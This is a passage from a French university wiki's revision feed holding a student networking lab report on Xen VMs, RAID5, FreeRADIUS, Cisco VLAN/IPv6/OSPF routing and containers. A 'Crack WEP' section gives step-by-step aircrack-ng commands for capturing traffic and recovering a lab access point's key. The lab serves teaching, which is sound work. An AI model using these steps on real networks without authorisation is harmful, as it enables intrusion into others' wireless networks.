=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49106</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49106"/>
				<updated>2018-12-21T15:36:20Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.6 Interconnexion avec Internet IPv6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
